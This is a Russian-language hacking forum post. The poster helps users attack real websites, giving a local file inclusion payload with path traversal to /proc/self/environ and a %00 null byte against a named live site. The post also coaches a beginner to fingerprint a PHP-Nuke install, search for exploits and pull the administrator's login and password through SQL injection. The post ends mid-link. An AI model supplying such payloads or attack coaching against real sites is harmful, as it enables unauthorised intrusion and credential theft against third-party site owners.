01.04.2012, 00:33
|
|
Познающий
Регистрация: 08.03.2012
Сообщений: 40
С нами:
7463126
Репутация:
74
|
|
Сообщение от kise
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ
Правильнее будет вот так:
Код:
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00
Увы, но скорее всего Вам не удастся залить шелл.
Сообщение от ASPIRIN90
Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ
хотя и это я определил лиш по структуре ссылок
https://www.site.com/admin.php?op=config
https://www.site.com/admin.php?op=users
https://www.site.com/safe.php?op=pos_order
Попробуйте определить версию форума, далее ищите эксплоиты. Особенно уязвима версия 7.8, удачного поиска.
UPD: Если Вы нашли sql inj, то попробуйте узнать логин и пароль администратора, желательно руками.
Пару ссылок:
23.3.2. SQL injection with PHP-Nuke
SQL inj PHP-Nuke: Module EasyContent
[URL="http://securityreason.com/securityalert/440"]SQL Inj PHPNuke x
|
|
|